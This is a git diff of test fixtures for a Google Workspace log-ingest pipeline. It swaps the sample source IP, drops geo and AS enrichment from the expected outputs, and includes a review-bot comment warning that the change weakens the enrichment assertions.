"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"invite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "invite_user", "id": "1", 
@@ -2104,31 +1708,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2143,7 +1729,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2168,8 +1754,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728273500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reject_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286141400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reject_join_request\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "reject_join_request", "id": "1", 
@@ -2203,31 +1789,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2242,7 +1810,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2267,8 +1835,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728275Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reinvite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286168800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"reinvite_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "reinvite_user", "id": "1", 
@@ -2302,31 +1870,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2341,7 +1891,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2366,8 +1916,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:29.728276400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:39:12.286173Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"groups\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"moderator_action\",\"name\":\"remove_user\",\"parameters\":[{\"name\":\"group_email\",\"value\":\"group@example.com\"},{\"name\":\"user_email\",\"value\":\"user@example.com\"}]}}", "provider": "groups", "action": "remove_user", "id": "1", 
diff --git a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log
index b721c74bf48..cc181596f84 100644
--- a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log
+++ b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log
@@ -1,14 +1,14 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_password_leak","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_login_less_secure_app","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"suspicious_programmatic_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_generic","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_spamming_through_relay","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_spamming","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"account_disabled_hijacked","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"account_warning","name":"gov_attack_warning"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_failure_type","value":"login_failure_access_code_disallowed"},{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_challenge","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_verification","parameters":[{"name":"is_second_factor","boolValue":false},{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"logout","parameters":[{"name":"login_type","value":"exchange"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"is_suspicious","boolValue":false},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_password_leak","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_login_less_secure_app","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"suspicious_programmatic_login","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_generic","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_spamming_through_relay","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_spamming","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"account_disabled_hijacked","parameters":[{"name":"affected_email_address","value":"foo@elastic.co"},{"name":"login_timestamp","intValue":1593695305123456}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"account_warning","name":"gov_attack_warning"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_failure","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_failure_type","value":"login_failure_access_code_disallowed"},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_challenge","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_verification","parameters":[{"name":"is_second_factor","boolValue":false},{"name":"login_challenge_method","value":"backup_code"},{"name":"login_challenge_status","value":"Challenge Passed."},{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"logout","parameters":[{"name":"login_type","value":"exchange"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"login","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"login","name":"login_success","parameters":[{"name":"login_challenge_method","value":"backup_code"},{"name":"is_suspicious","boolValue":false},{"name":"login_type","value":"exchange"}]}}
diff --git a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json
index 0f042b5c60c..1260efd85eb 100644
--- a/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json
+++ b/packages/google_workspace/data_stream/login/_dev/test/pipeline/test-login.log-expected.json
@@ -11,7 +11,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -33,35 +33,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:30.429403Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_password_leak\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
+ "ingested": "2021-12-09T13:39:16.340887200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_password_leak\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}",
 "provider": "login",
 "action": "account_disabled_password_leak",
 "id": "1",
@@ -97,7 +97,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
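Review bot: The new expected output for this event drops `source.geo` and `source.as` altogether instead of replacing the values recorded for 98.235.162.24 with those for 67.43.156.13, so the pipeline test no longer asserts that `source.ip` is enriched at all, and a regression that silently stops the geoip enrichment would still pass. If the stack used to regenerate the file had no GeoIP database loaded, the file should be regenerated against the test database the supported subset exists for and the `geo`/`as` objects kept; if enrichment was deliberately removed from the pipeline, that is a behavior change worth a changelog line of its own. The same pattern repeats in every remaining `source` hunk of this file and in both hunks of test-saml.log-expected.json. The `event.ingested` values are also rewritten on every regeneration; unless the package's pipeline test config already treats that field as dynamic, these churn lines will reappear on each run.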
@@ -120,35 +102,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429408800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "ingested": "2021-12-09T13:39:16.340892600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", "action": "suspicious_login", @@ -184,7 +148,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -207,35 +171,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429410700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "ingested": "2021-12-09T13:39:16.340898900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", "action": "suspicious_login_less_secure_app", @@ -271,7 +217,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -294,35 +240,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429412300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "ingested": "2021-12-09T13:39:16.340903900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", "provider": "login", "start": "2020-07-02T13:08:25.123Z", "action": "suspicious_programmatic_login", @@ -358,7 +286,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -380,35 +308,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:30.429417200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_generic\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", + "ingested": "2021-12-09T13:39:16.340907800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_generic\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"}]}}", "provider": "login", "action": "account_disabled_generic", "id": "1", @@ -444,7 +354,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
